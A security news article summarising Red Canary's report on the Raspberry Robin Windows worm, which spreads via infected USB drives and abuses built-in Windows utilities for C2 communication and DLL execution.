Red Canary intelligence analysts have discovered a new Windows malware that spreads using external USB drives.
This malware was first observed in September 2021 and is linked to a cluster of malicious activity dubbed Raspberry Robin.
Red Canary’s Detection Engineering team detected the worm in many customers’ networks, some in the technology and manufacturing sectors.
It spreads to new Windows systems when an infected USB drive containing a malicious .LNK file is connected.
Once it is attached, the worm spawns a new process. It uses cmd.exe to launch a malicious file stored on the infected drive.
It reaches out to its command-and-control (C2) servers, likely hosted on compromised QNAP devices using Microsoft Standard Installer (msiexec.exe) and TOR exit nodes as other C2 infrastructure.
“While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware,” the researchers said.
“Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”
They are yet to find out if it establishes persistence and through which methods. It is suspected that the malware installs a malicious DLL file on infected machines to resist removal between restarts.
Raspberry Robin launches this DLL with the help of two other legitimate Windows utilities: fodhelper and odbcconf
The first one allows it to bypass User Account Control, while the other helps it execute and configure the DLL.
Red Canary analysts have been able to closely inspect what the newly discovered does on infected systems, but there are still several questions that need to be answered.
“First and foremost, we don’t know how or where Raspberry Robin infects external drives to perpetuate its activity, though it’s likely this occurs offline or otherwise outside of our visibility. We also don’t know why Raspberry Robin installs a malicious DLL,” the researchers said.
“One hypothesis is that it may be an attempt to establish persistence on an infected system, though additional information is required to build confidence in that hypothesis.”
There is no info on the malware’s end-stage malicious tasks, and Raspberry Robin operators’ goal is still unknown.
Found this article interesting? Click here to read more exclusive content we post.